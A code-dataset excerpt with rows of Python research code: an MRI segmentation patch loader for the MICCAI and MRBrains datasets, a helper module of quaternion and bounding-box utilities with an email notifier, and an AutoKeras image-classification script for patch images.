extra_patch = (overflow / patch_shape) < minimum_overflow_fraction
while extra_patch.any():
overflow += extra_patch*eff_patch_shape
n_patches += extra_patch
extra_patch = (overflow / patch_shape) < minimum_overflow_fraction
# Select random start index so that overlap is spread randomly
# on both sides. If overflow is larger than patch_shape
max_start_offset = overflow
start_index = -np.array([np.random.choice(offset + 1)
for offset in max_start_offset])
else:
# Set start index to overflow is spread evenly on both sides
start_index = -np.ceil(overflow/2).astype(int)
# In the non-randomize setting, we still one to make sure that the
# last patch sticks outside the image with at least overlap/2, i.e,
# that overflow/2 > overlap/2 (since the overflow is distributed
# evenly on both sides when randomize_offset=True
extra_patch = (overflow < overlap)
while extra_patch.any():
overflow += extra_patch*eff_patch_shape
n_patches += extra_patch
extra_patch = (overflow < overlap)
# stop_index = image_shape + start_index + overflow
step_size = eff_patch_shape
stop_index = start_index + step_size*n_patches
return (np.mgrid[start_index[0]:stop_index[0]:step_size[0],
start_index[1]:stop_index[1]:step_size[1],
start_index[2]:stop_index[2]:step_size[2]].reshape(3, -1).T,
overflow)
| # pylint: disable=C,R,E1101
import torch
import h5py
import numpy as np
import numbers
import sys
miccai_filters = {
'train': ["1000_3",
"1001_3",
"1002_3",
"1006_3",
"1007_3",
"1008_3",
"1009_3",
"1010_3",
"1011_3",
"1012_3",
"1013_3",
"1014_3"],
'validation': ["1015_3",
"1017_3",
"1036_3"],
'test': ["1003_3",
"1004_3",
"1005_3",
"1018_3",
"1019_3",
"1023_3",
"1024_3",
"1025_3",
"1038_3",
"1039_3",
"1101_3",
"1104_3",
"1107_3",
"1110_3",
"1113_3",
"1116_3",
"1119_3",
"1122_3",
"1125_3",
"1128_3"]
}
# check that filters are non-overlapping
assert len(set(miccai_filters['train']).intersection(miccai_filters['validation'])) == 0
assert len(set(miccai_filters['train']).intersection(miccai_filters['test'])) == 0
def get_miccai_dataloader(dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
batch_size,
num_workers,
pin_memory,
**read_data_kwargs):
if mode == 'train':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='train',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True)
np.set_printoptions(threshold=np.nan)
if mode in ['train', 'validation']:
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='validation',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
if mode == 'test':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='test',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
return data_set, data_loader
def get_mrbrains_dataloader(dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
batch_size,
num_workers,
pin_memory,
N_train):
if mode == 'train':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='train',
patch_shape=patch_shape,
patch_overlap=patch_overlap)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True)
np.set_printoptions(threshold=np.nan)
print(np.unique(data_set.labels[0]))
if mode in ['train', 'validation']:
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='validation',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
if mode == 'test':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='test',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
return data_set, data_loader
def read_h5_data(dataset, h5_filename, mode, **read_data_kwargs):
''' read MRI datasets from h5 files
:param dataset: selects miccai or mrbrains, the latter with either reduced or full labels
:param h5_filename: path to the h5 file
:param mode: load train, validation or test set
'''
assert dataset in ['miccai', 'mrbrains_reduced', 'mrbrains_full']
assert mode in ['train', 'validation', 'test']
if dataset == 'miccai':
return read_h5_data_miccai(h5_filename, mode, **read_data_kwargs)
else:
label_mode = dataset.split('_')[-1] # 'reduced' or 'full'
return read_h5_data_mrbrains(h5_filename, mode, label_mode, **read_data_kwargs)
def read_h5_data_miccai(h5_filename, mode, filter=None):
''' to be called from read_h5_data '''
data = []
labels = []
unpadded_data_spatial_shape = []
padding_boundary = []
patch_indices = []
if filter == None:
filter = miccai_filters.get(mode)
with h5py.File(h5_filename, 'r') as hf:
for name in filter:
# Assumption: voxel value and pixel are stored in last dim
signal_volume = hf[name][:][:,:,:,0].squeeze()[np.newaxis,...]
label_volume = hf[name][:][:,:,:,1].squeeze()
data.append(signal_volume)
labels.append(label_volume)
unpadded_data_spatial_shape.append(data[-1].shape[1:])
padding_boundary.append(None)
class_count = hf['class_counts'][:]
# signal_mean = hf['signal_mean'][:]
# signal_std = hf['signal_std'][:]
# bg_values = -signal_mean/signal_std # since original bg value was zero
return data, labels, unpadded_data_spatial_shape, padding_boundary, class_count
def read_h5_data_mrbrains(h5_filename, mode, label_mode, N_train=4):
''' to be called from read_h5_data
training set is split into N_train training samples and 5-N_train validation samples
'''
with h5py.File(h5_filename, 'r') as hf:
if mode == 'train':
data = [hf['train_signal_{}'.format(i)][()] for i in range(N_train)]
labels = [hf['train_label_{}_{}'.format(label_mode, i)][()] for i in range(N_train)]
elif mode == 'validation':
data = [hf['train_signal_{}'.format(i)][()] for i in range(N_train, 5)]
labels = [hf['train_label_{}_{}'.format(label_mode, i)][()] for i in range(N_train, 5)]
elif mode == 'test':
data = [hf['test_signal_{}'.format(i)][()] for i in range(15)]
labels = None
class_count = hf['class_counts_{}'.format(label_mode)][:]
unpadded_data_spatial_shape = [d.shape[1:] for d in data]
padding_boundary = [None for d in data]
# channel_means = hf['channel_means'][:]
# channel_stds = hf['channel_stds'][:]
return data, labels, unpadded_data_spatial_shape, padding_boundary, class_count
class MRISegmentation(torch.utils.data.Dataset):
''' Read 3D medical image files in .nii format, and provide it to the
user as 3D patches of the requested size. Setting
randomize_patch_offsets=True will add random offsets to the
patches to reduce the affect of patch boundaries.
:param dataset: dataset to be loaded. options are 'miccai', 'mrbrains_reduced' and 'mrbrains_full'
:param h5_filename: path to the hdf5 file
:param mode: load 'train', 'validation' or 'test' set
:param patch_shape:
:param filter: optional - only for miccai select exactly which scans to load
:param randomize_patch_offsets:
# :param pad_mode:
:param pad_constant:
:param read_data_kwargs: keywordargs options for different datasets
used to pass `filter` for miccai and `N_train` for mrbrains
'''
def __init__(self,
dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
randomize_patch_offsets=True,
# pad_mode='constant',
# pad_constant=0,
**read_data_kwargs):
if isinstance(patch_shape, numbers.Integral):
patch_shape = np.repeat(patch_shape, 3)
if isinstance(patch_overlap, numbers.Integral):
patch_overlap = np.repeat(patch_overlap, 3)
self.patch_shape = patch_shape
self.patch_overlap = patch_overlap
self.randomize_patch_offsets = randomize_patch_offsets
# self.pad_mode = pad_mode
# self.pad_constant = pad_constant
# self.log10_signal = log10_signal
# Read H5 file
print("Reading data...", end="")
sys.stdout.flush()
self.data, self.labels, self.unpadded_data_spatial_shape, self.padding_boundary, self.class_count = \
read_h5_data(dataset, h5_filename, mode, **read_data_kwargs)
print("done.")
# This first call to initialize_patch_indices will calculate the
# total padding around each image, and store it in self.padding_boundary
self.initialize_patch_indices()
# The total padding is fixed to a multiple of the patch size - we
# can therefore add the full padding in the setup fase
print("Applying padding...", end="")
sys.stdout.flush()
for i, image in enumerate(self.data):
pad_width = self.padding_boundary[i]
# for data which contains a channel dimension add an entry to pad_width
if len(self.data[i].shape) == 4:
pad_width_data = np.insert(pad_width, 0, values=0, axis=0)
# self.data[i] = np.pad(self.data[i], pad_width_data,
# mode=self.pad_mode,
# constant_values=self.pad_constant)
# self.labels[i] = np.pad(self.labels[i], pad_width,
# mode=self.pad_mode,
# constant_values=self.pad_constant).astype(np.int64)
pad_mode = 'symmetric' # constant value padding unclear for some signal channels
self.data[i] = np.pad(self.data[i], pad_width_data, mode=pad_mode)
self.labels[i] = np.pad(self.labels[i], pad_width, mode=pad_mode).astype(np.int64)
print("done.")
# # optionally logarithmize zero shifted input signal
# if self.log10_signal:
# print('logarithmize signal')
# signal_min = min([np.min(data_i) for data_i in self.data])
# for i in range(len(self.data)):
# self.data[i] = np.log10(self.data[i] + signal_min + 1) # add 1 to prevent -inf from the log
def get_original(self, dataset_index):
"""Get full input image at specified index"""
size = self.unpadded_data_spatial_shape[dataset_index]
patch_index_start = self.padding_boundary[dataset_index][:,0]
patch_index_end = patch_index_start + size
patch_index = np.stack((patch_index_start, patch_index_end))
return (self.data[dataset_index][patch_index[0, 0]:patch_index[1, 0],
patch_index[0, 1]:patch_index[1, 1],
patch_index[0, 2]:patch_index[1, 2]],
self.labels[dataset_index][patch_index[0, 0]:patch_index[1, 0],
patch_index[0, 1]:patch_index[1, 1],
patch_index[0, 2]:patch_index[1, 2]])
def initialize_patch_indices(self):
"""For each image, calculate the indices for each patch, possibly
shifted by a random offset"""
self.patch_indices = []
for i, image in enumerate(self.data):
patch_indices, overflow = self.calc_patch_indices(
self.unpadded_data_spatial_shape[i],
self.patch_shape,
overlap=self.patch_overlap,
randomize_offset=self.randomize_patch_offsets)
patch_indices = np.append(np.full(shape=(patch_indices.shape[0],1),
fill_value=i),
patch_indices, axis=1)
self.patch_indices += patch_indices.tolist()
# Keep track of how much each image has been padded
if self.padding_boundary[i] is None:
pad_width = np.stack([overflow, overflow], axis=1)
self.padding_boundary[i] = pad_width
def __getitem__(self, index):
"""Retrieve a single patch"""
# Which image to retrieve patch from
dataset_index = self.patch_indices[index][0]
# Extract image and label
image = self.data[dataset_index]
labels = self.labels[dataset_index]
# Obtain patch indices into original image
patch_index_start = np.array(self.patch_indices[index][1:],
dtype=np.int16)
patch_index_end = patch_index_start + self.patch_shape
patch_index = np.stack((patch_index_start, patch_index_end))
patch_valid = np.stack(patch_index).clip(
min=0, max=self.unpadded_data_spatial_shape[dataset_index]) - patch_index[0]
# Update patch indices to padded image
patch_index_padded = patch_index + self.padding_boundary[dataset_index][:,0]
# # OLD VERSION
# # assumed images not to have channel dimension yet and hence adds it
# Lookup image and add channel dimension
# image_patch = np.expand_dims(
# image[patch_index_padded[0, 0]:patch_index_padded[1, 0],
# patch_index_padded[0, 1]:patch_index_padded[1, 1],
# patch_index_padded[0, 2]:patch_index_padded[1, 2]],
# axis=0).astype(np.float32)
# Slice image patch
image_patch = image[:, patch_index_padded[0, 0]:patch_index_padded[1, 0],
patch_index_padded[0, 1]:patch_index_padded[1, 1],
patch_index_padded[0, 2]:patch_index_padded[1, 2]].astype(np.float32)
# Slice label patch and add dimension
labels_patch = np.expand_dims(
labels[patch_index_padded[0, 0]:patch_index_padded[1, 0],
patch_index_padded[0, 1]:patch_index_padded[1, 1],
patch_index_padded[0, 2]:patch_index_padded[1, 2]],
axis=0)
# print("image: ", image_patch)
# Check that patch has the correct size
assert np.all(image_patch[0].shape == self.patch_shape)
assert np.all(labels_patch[0].shape == self.patch_shape)
return image_patch, labels_patch, dataset_index, patch_index, patch_valid
def __len__(self):
return len(self.patch_indices)
@staticmethod
def calc_patch_indices(image_shape,
patch_shape,
overlap=0,
randomize_offset=True,
minimum_overflow_fraction=0.25):
"""
Given the image shape and the patch shape, calculate the placement
of patches. If randomize_offset is on, it will randomize the placement,
so that the patch boundaries affect different regions in each epoch.
There is natural room for this randomization whenever the image size
if not divisible by the patch size, in the sense that the overflow
can be placed arbitrarily in the beginning on the end. If you want
to ensure that some randomization will always occur, you can set
minimum_overflow_fraction, which will ensure that an extra patch will
be added to provide extra overflow if necessary.
:param image_shape: Shape if input image
:param patch_shape: Shape of patch
:param overlap: Allow patches to overlap with this number of voxels
:param randomize_offset: Whether patch placement should be normalized
:param minimum_overflow_fraction: Specify to force overflow beyond image
to be at least this fraction of the patch size
:return:
"""
if isinstance(overlap, numbers.Integral):
overlap = np.repeat(overlap, len(image_shape))
# Effective patch shape
eff_patch_shape = (patch_shape - overlap)
# Number of patches (rounding up)
n_patches = np.ceil((image_shape - patch_shape) / eff_patch_shape + 1).astype(int)
# Overflow of voxels beyond image
overflow = eff_patch_shape * n_patches - image_shape + overlap
if randomize_offset:
# Add extra patch for dimensions where minimum is below fraction
extra_patch = (overflow / patch_shape) < minimum_overflow_fraction
while extra_patch.any():
overflow += extra_patch*eff_patch_shape
n_patches += extra_patch
extra_patch = (overflow / patch_shape) < minimum_overflow_fraction
# Select random start index so that overlap is spread randomly
# on both sides. If overflow is larger than patch_shape
max_start_offset = overflow
start_index = -np.array([np.random.choice(offset + 1)
for offset in max_start_offset])
else:
# Set start index to overflow is spread evenly on both sides
start_index = -np.ceil(overflow/2).astype(int)
# In the non-randomize setting, we still one to make sure that the
# last patch sticks outside the image with at least overlap/2, i.e,
# that overflow/2 > overlap/2 (since the overflow is distributed
# evenly on both sides when randomize_offset=True
extra_patch = (overflow < overlap)
while extra_patch.any():
overflow += extra_patch*eff_patch_shape
n_patches += extra_patch
extra_patch = (overflow < overlap)
# stop_index = image_shape + start_index + overflow
step_size = eff_patch_shape
stop_index = start_index + step_size*n_patches
return (np.mgrid[start_index[0]:stop_index[0]:step_size[0],
start_index[1]:stop_index[1]:step_size[1],
start_index[2]:stop_index[2]:step_size[2]].reshape(3, -1).T,
overflow)
| en | 0.801638 | # pylint: disable=C,R,E1101 # check that filters are non-overlapping read MRI datasets from h5 files :param dataset: selects miccai or mrbrains, the latter with either reduced or full labels :param h5_filename: path to the h5 file :param mode: load train, validation or test set # 'reduced' or 'full' to be called from read_h5_data # Assumption: voxel value and pixel are stored in last dim # signal_mean = hf['signal_mean'][:] # signal_std = hf['signal_std'][:] # bg_values = -signal_mean/signal_std # since original bg value was zero to be called from read_h5_data training set is split into N_train training samples and 5-N_train validation samples # channel_means = hf['channel_means'][:] # channel_stds = hf['channel_stds'][:] Read 3D medical image files in .nii format, and provide it to the user as 3D patches of the requested size. Setting randomize_patch_offsets=True will add random offsets to the patches to reduce the affect of patch boundaries. :param dataset: dataset to be loaded. options are 'miccai', 'mrbrains_reduced' and 'mrbrains_full' :param h5_filename: path to the hdf5 file :param mode: load 'train', 'validation' or 'test' set :param patch_shape: :param filter: optional - only for miccai select exactly which scans to load :param randomize_patch_offsets: # :param pad_mode: :param pad_constant: :param read_data_kwargs: keywordargs options for different datasets used to pass `filter` for miccai and `N_train` for mrbrains # pad_mode='constant', # pad_constant=0, # self.pad_mode = pad_mode # self.pad_constant = pad_constant # self.log10_signal = log10_signal # Read H5 file # This first call to initialize_patch_indices will calculate the # total padding around each image, and store it in self.padding_boundary # The total padding is fixed to a multiple of the patch size - we # can therefore add the full padding in the setup fase # for data which contains a channel dimension add an entry to pad_width # self.data[i] = np.pad(self.data[i], pad_width_data, # mode=self.pad_mode, # constant_values=self.pad_constant) # self.labels[i] = np.pad(self.labels[i], pad_width, # mode=self.pad_mode, # constant_values=self.pad_constant).astype(np.int64) # constant value padding unclear for some signal channels # # optionally logarithmize zero shifted input signal # if self.log10_signal: # print('logarithmize signal') # signal_min = min([np.min(data_i) for data_i in self.data]) # for i in range(len(self.data)): # self.data[i] = np.log10(self.data[i] + signal_min + 1) # add 1 to prevent -inf from the log Get full input image at specified index For each image, calculate the indices for each patch, possibly shifted by a random offset # Keep track of how much each image has been padded Retrieve a single patch # Which image to retrieve patch from # Extract image and label # Obtain patch indices into original image # Update patch indices to padded image # # OLD VERSION # # assumed images not to have channel dimension yet and hence adds it # Lookup image and add channel dimension # image_patch = np.expand_dims( # image[patch_index_padded[0, 0]:patch_index_padded[1, 0], # patch_index_padded[0, 1]:patch_index_padded[1, 1], # patch_index_padded[0, 2]:patch_index_padded[1, 2]], # axis=0).astype(np.float32) # Slice image patch # Slice label patch and add dimension # print("image: ", image_patch) # Check that patch has the correct size Given the image shape and the patch shape, calculate the placement of patches. If randomize_offset is on, it will randomize the placement, so that the patch boundaries affect different regions in each epoch. There is natural room for this randomization whenever the image size if not divisible by the patch size, in the sense that the overflow can be placed arbitrarily in the beginning on the end. If you want to ensure that some randomization will always occur, you can set minimum_overflow_fraction, which will ensure that an extra patch will be added to provide extra overflow if necessary. :param image_shape: Shape if input image :param patch_shape: Shape of patch :param overlap: Allow patches to overlap with this number of voxels :param randomize_offset: Whether patch placement should be normalized :param minimum_overflow_fraction: Specify to force overflow beyond image to be at least this fraction of the patch size :return: # Effective patch shape # Number of patches (rounding up) # Overflow of voxels beyond image # Add extra patch for dimensions where minimum is below fraction # Select random start index so that overlap is spread randomly # on both sides. If overflow is larger than patch_shape # Set start index to overflow is spread evenly on both sides # In the non-randomize setting, we still one to make sure that the # last patch sticks outside the image with at least overlap/2, i.e, # that overflow/2 > overlap/2 (since the overflow is distributed # evenly on both sides when randomize_offset=True # stop_index = image_shape + start_index + overflow | 2.066897 | 2 |
src/helper/helper.py | JonasFrey96/PLR2 | 0 | 6616722 | <gh_stars>0
import yagmail
from sklearn.neighbors import NearestNeighbors
import yaml
import numpy as np
import collections
import torch
import copy
def flatten_list(d, parent_key='', sep='_'):
items = []
for num, element in enumerate(d):
new_key = parent_key + sep + str(num) if parent_key else str(num)
if isinstance(element, collections.MutableMapping):
items.extend(flatten_dict(element, new_key, sep=sep).items())
else:
if isinstance(element, list):
if isinstance(element[0], dict):
items.extend(flatten_list(element, new_key, sep=sep))
continue
items.append((new_key, element))
return items
def flatten_dict(d, parent_key='', sep='_'):
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, collections.MutableMapping):
items.extend(flatten_dict(v, new_key, sep=sep).items())
else:
if isinstance(v, list):
if isinstance(v[0], dict):
items.extend(flatten_list(v, new_key, sep=sep))
continue
items.append((new_key, v))
return dict(items)
def norm_quat(q):
# ToDo raise type and dim error
return q / torch.sqrt(torch.sum(q * q))
def pad(s, sym='-', p='l', length=80):
if len(s) > length:
return s
else:
if p == 'c':
front = int((length - len(s)) / 2)
s = sym * front + s
back = int(length - len(s))
s = s + sym * back
if p == 'l':
back = int(length - len(s))
s = s + sym * back
return s
def re_quat(q, input_format):
if input_format == 'xyzw':
if isinstance(q, torch.Tensor):
v0 = q[0].clone()
else:
v0 = copy.deepcopy(q[0])
q[0] = q[3]
q[3] = q[2]
q[2] = q[1]
q[1] = v0
return q
elif input_format == 'wxyz':
if isinstance(q, torch.Tensor):
v0 = q[0].clone()
else:
v0 = copy.deepcopy(q[0])
q[0] = q[1]
q[1] = q[2]
q[2] = q[3]
q[3] = v0
return q
def send_email(text):
yag = yagmail.SMTP('trackthisplr', "TrackThis")
contents = [
"Run is finished!",
text
]
yag.send('<EMAIL>',
'PLR - TrackThis - Lagopus', contents)
yag.send('<EMAIL>',
'PLR - TrackThis - Lagopus', contents)
def compose_quat(p, q, device):
"""
input is wxyz
"""
q = norm_quat(re_quat(q.squeeze(), 'wxyz')).unsqueeze(0)
p = norm_quat(re_quat(p.squeeze(), 'wxyz')).unsqueeze(0)
product = torch.zeros(
(max(p.shape[0], q.shape[0]), 4), dtype=torch.float32, device=device)
product[:, 3] = p[:, 3] * q[:, 3] - torch.sum(p[:, :3] * q[:, :3], (1))
product[:, :3] = (p[:, None, 3] * q[:, :3] + q[:, None, 3] * p[:, :3] +
torch.cross(p[:, :3], q[:, :3]))
return re_quat(product.squeeze(0), 'xyzw')
def rotation_angle(q, device):
# in radians
q = norm_quat(q)
unit_r = torch.t(torch.tensor(
[[0, 0, 0, 1]], dtype=torch.float32, device=device))
return torch.asin(torch.mm(q, unit_r)) * 2
def nearest_neighbor(src, dst):
assert src.shape[1] == dst.shape[1]
neigh = NearestNeighbors(n_neighbors=1, n_jobs=8)
neigh.fit(dst)
distances, indices = neigh.kneighbors(src, return_distance=True)
return distances.ravel(), indices.ravel()
def replace_item(obj, key, replace_value):
for k, v in obj.items():
if isinstance(v, dict):
obj[k] = replace_item(v, key, replace_value)
if key in obj:
obj[key] = replace_value
return obj
def generate_unique_idx(num, max_idx):
a = random.sample(range(0, max_idx), k=min(num, max_idx))
while len(a) < num:
a = a + random.sample(
range(0, max_idx), k=min(max_idx, num - len(a)))
return a
def get_bbox_480_640(label):
border_list = [-1, 40, 80, 120, 160, 200, 240, 280,
320, 360, 400, 440, 480, 520, 560, 600, 640, 680]
img_width = 480
img_length = 640
# print(type(label))
rows = np.any(label, axis=1)
cols = np.any(label, axis=0)
rmin, rmax = np.where(rows)[0][[0, -1]]
cmin, cmax = np.where(cols)[0][[0, -1]]
rmax += 1
cmax += 1
r_b = rmax - rmin
for tt in range(len(border_list)):
if r_b > border_list[tt] and r_b < border_list[tt + 1]:
r_b = border_list[tt + 1]
break
c_b = cmax - cmin
for tt in range(len(border_list)):
if c_b > border_list[tt] and c_b < border_list[tt + 1]:
c_b = border_list[tt + 1]
break
center = [int((rmin + rmax) / 2), int((cmin + cmax) / 2)]
rmin = center[0] - int(r_b / 2)
rmax = center[0] + int(r_b / 2)
cmin = center[1] - int(c_b / 2)
cmax = center[1] + int(c_b / 2)
if rmin < 0:
delt = -rmin
rmin = 0
rmax += delt
if cmin < 0:
delt = -cmin
cmin = 0
cmax += delt
if rmax > img_width:
delt = rmax - img_width
rmax = img_width
rmin -= delt
if cmax > img_length:
delt = cmax - img_length
cmax = img_length
cmin -= delt
return rmin, rmax, cmin, cmax
| import yagmail
from sklearn.neighbors import NearestNeighbors
import yaml
import numpy as np
import collections
import torch
import copy
def flatten_list(d, parent_key='', sep='_'):
items = []
for num, element in enumerate(d):
new_key = parent_key + sep + str(num) if parent_key else str(num)
if isinstance(element, collections.MutableMapping):
items.extend(flatten_dict(element, new_key, sep=sep).items())
else:
if isinstance(element, list):
if isinstance(element[0], dict):
items.extend(flatten_list(element, new_key, sep=sep))
continue
items.append((new_key, element))
return items
def flatten_dict(d, parent_key='', sep='_'):
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, collections.MutableMapping):
items.extend(flatten_dict(v, new_key, sep=sep).items())
else:
if isinstance(v, list):
if isinstance(v[0], dict):
items.extend(flatten_list(v, new_key, sep=sep))
continue
items.append((new_key, v))
return dict(items)
def norm_quat(q):
# ToDo raise type and dim error
return q / torch.sqrt(torch.sum(q * q))
def pad(s, sym='-', p='l', length=80):
if len(s) > length:
return s
else:
if p == 'c':
front = int((length - len(s)) / 2)
s = sym * front + s
back = int(length - len(s))
s = s + sym * back
if p == 'l':
back = int(length - len(s))
s = s + sym * back
return s
def re_quat(q, input_format):
if input_format == 'xyzw':
if isinstance(q, torch.Tensor):
v0 = q[0].clone()
else:
v0 = copy.deepcopy(q[0])
q[0] = q[3]
q[3] = q[2]
q[2] = q[1]
q[1] = v0
return q
elif input_format == 'wxyz':
if isinstance(q, torch.Tensor):
v0 = q[0].clone()
else:
v0 = copy.deepcopy(q[0])
q[0] = q[1]
q[1] = q[2]
q[2] = q[3]
q[3] = v0
return q
def send_email(text):
yag = yagmail.SMTP('trackthisplr', "TrackThis")
contents = [
"Run is finished!",
text
]
yag.send('<EMAIL>',
'PLR - TrackThis - Lagopus', contents)
yag.send('<EMAIL>',
'PLR - TrackThis - Lagopus', contents)
def compose_quat(p, q, device):
"""
input is wxyz
"""
q = norm_quat(re_quat(q.squeeze(), 'wxyz')).unsqueeze(0)
p = norm_quat(re_quat(p.squeeze(), 'wxyz')).unsqueeze(0)
product = torch.zeros(
(max(p.shape[0], q.shape[0]), 4), dtype=torch.float32, device=device)
product[:, 3] = p[:, 3] * q[:, 3] - torch.sum(p[:, :3] * q[:, :3], (1))
product[:, :3] = (p[:, None, 3] * q[:, :3] + q[:, None, 3] * p[:, :3] +
torch.cross(p[:, :3], q[:, :3]))
return re_quat(product.squeeze(0), 'xyzw')
def rotation_angle(q, device):
# in radians
q = norm_quat(q)
unit_r = torch.t(torch.tensor(
[[0, 0, 0, 1]], dtype=torch.float32, device=device))
return torch.asin(torch.mm(q, unit_r)) * 2
def nearest_neighbor(src, dst):
assert src.shape[1] == dst.shape[1]
neigh = NearestNeighbors(n_neighbors=1, n_jobs=8)
neigh.fit(dst)
distances, indices = neigh.kneighbors(src, return_distance=True)
return distances.ravel(), indices.ravel()
def replace_item(obj, key, replace_value):
for k, v in obj.items():
if isinstance(v, dict):
obj[k] = replace_item(v, key, replace_value)
if key in obj:
obj[key] = replace_value
return obj
def generate_unique_idx(num, max_idx):
a = random.sample(range(0, max_idx), k=min(num, max_idx))
while len(a) < num:
a = a + random.sample(
range(0, max_idx), k=min(max_idx, num - len(a)))
return a
def get_bbox_480_640(label):
border_list = [-1, 40, 80, 120, 160, 200, 240, 280,
320, 360, 400, 440, 480, 520, 560, 600, 640, 680]
img_width = 480
img_length = 640
# print(type(label))
rows = np.any(label, axis=1)
cols = np.any(label, axis=0)
rmin, rmax = np.where(rows)[0][[0, -1]]
cmin, cmax = np.where(cols)[0][[0, -1]]
rmax += 1
cmax += 1
r_b = rmax - rmin
for tt in range(len(border_list)):
if r_b > border_list[tt] and r_b < border_list[tt + 1]:
r_b = border_list[tt + 1]
break
c_b = cmax - cmin
for tt in range(len(border_list)):
if c_b > border_list[tt] and c_b < border_list[tt + 1]:
c_b = border_list[tt + 1]
break
center = [int((rmin + rmax) / 2), int((cmin + cmax) / 2)]
rmin = center[0] - int(r_b / 2)
rmax = center[0] + int(r_b / 2)
cmin = center[1] - int(c_b / 2)
cmax = center[1] + int(c_b / 2)
if rmin < 0:
delt = -rmin
rmin = 0
rmax += delt
if cmin < 0:
delt = -cmin
cmin = 0
cmax += delt
if rmax > img_width:
delt = rmax - img_width
rmax = img_width
rmin -= delt
if cmax > img_length:
delt = cmax - img_length
cmax = img_length
cmin -= delt
return rmin, rmax, cmin, cmax | en | 0.550011 | # ToDo raise type and dim error input is wxyz # in radians # print(type(label)) | 2.383941 | 2 |
auto-keras-patches.py | alievilya/nni-patches | 0 | 6616723 | import numpy as np
import tensorflow as tf
from tensorflow.keras.datasets import mnist
import autokeras as ak
import numpy as np
import os
import cv2
import json
from os.path import isfile, join
from sklearn.model_selection import train_test_split
# TODO: argparse
def load_images(file_path, size=120, is_train=True):
with open('X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/dataset_files/labels.json', 'r') as fp:
labels_dict = json.load(fp)
with open('X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/dataset_files/encoded_labels.json', 'r') as fp:
encoded_labels = json.load(fp)
Xarr = []
Yarr = []
number_of_classes = 3
files = [f for f in os.listdir(file_path) if isfile(join(file_path, f))]
files.sort()
for filename in files:
image = cv2.imread(join(file_path, filename))
# image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = cv2.resize(image, (size, size))
Xarr.append(image)
label_names = labels_dict[filename[:-4]]
each_file_labels = [0 for _ in range(number_of_classes)]
for name in label_names:
num_label = encoded_labels[name]
# each_file_labels.append(num_label)
each_file_labels[num_label] = 1
Yarr.append(each_file_labels)
Xarr = np.array(Xarr)
Yarr = np.array(Yarr)
# Xarr = Xarr.reshape(-1, size, size, 1)
return Xarr, Yarr
def load_patches(file_path='X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/Generated_dataset'):
Xtrain, Ytrain = load_images(file_path, size=120, is_train=True)
new_Ytrain = []
for y in Ytrain:
ys = np.argmax(y)
new_Ytrain.append(ys)
new_Ytrain = np.array(new_Ytrain)
Xtrain, Xval, Ytrain, Yval = train_test_split(Xtrain, new_Ytrain, random_state=1, train_size=0.8)
return (Xtrain, Ytrain), (Xval, Yval)
(x_train, y_train), (x_test, y_test) = load_patches()
x_train, x_test = x_train / 255.0, x_test / 255.0
#
# (x_train, y_train), (x_test, y_test) = mnist.load_data()
# print(x_train.shape) # (60000, 28, 28)
print(y_train.shape) # (60000,)
print(y_train[:3]) # array([7, 2, 1], dtype=uint8)
# # Initialize the image classifier.
# clf = ak.ImageClassifier(overwrite=True, max_trials=1)
# # Feed the image classifier with training data.
# clf.fit(x_train, y_train, epochs=10)
#
#
# # Predict with the best model.
# predicted_y = clf.predict(x_test)
# print(predicted_y)
#
#
# # Evaluate the best model with testing data.
# print(clf.evaluate(x_test, y_test))
clf = ak.ImageClassifier(
num_classes=3,
multi_label=False,
loss=None,
metrics=None,
max_trials=5,
directory=None,
objective="val_loss",
overwrite=False
)
# input_node = ak.ImageInput()
# output_node = ak.Normalization()(input_node)
# output_node = ak.ImageAugmentation(horizontal_flip=False)(output_node)
# output_node = ak.ResNetBlock(version="v2")(output_node)
# output_node = ak.ClassificationHead()(output_node)
# clf = ak.AutoModel(
# inputs=input_node, outputs=output_node, overwrite=True, max_trials=1
# )
clf.fit(
x_train,
y_train,
# Split the training data and use the last 15% as validation data.
validation_split=0.2,
epochs=10,
)
# Predict with the best model.
predicted_y = clf.predict(x_test)
print(predicted_y)
# Evaluate the best model with testing data.
print(clf.evaluate(x_test, y_test))
# get the best performing model
model = clf.export_model()
# summarize the loaded model
model.summary()
# save the best performing model to file
model.save('model_autokeras.h5') | import numpy as np
import tensorflow as tf
from tensorflow.keras.datasets import mnist
import autokeras as ak
import numpy as np
import os
import cv2
import json
from os.path import isfile, join
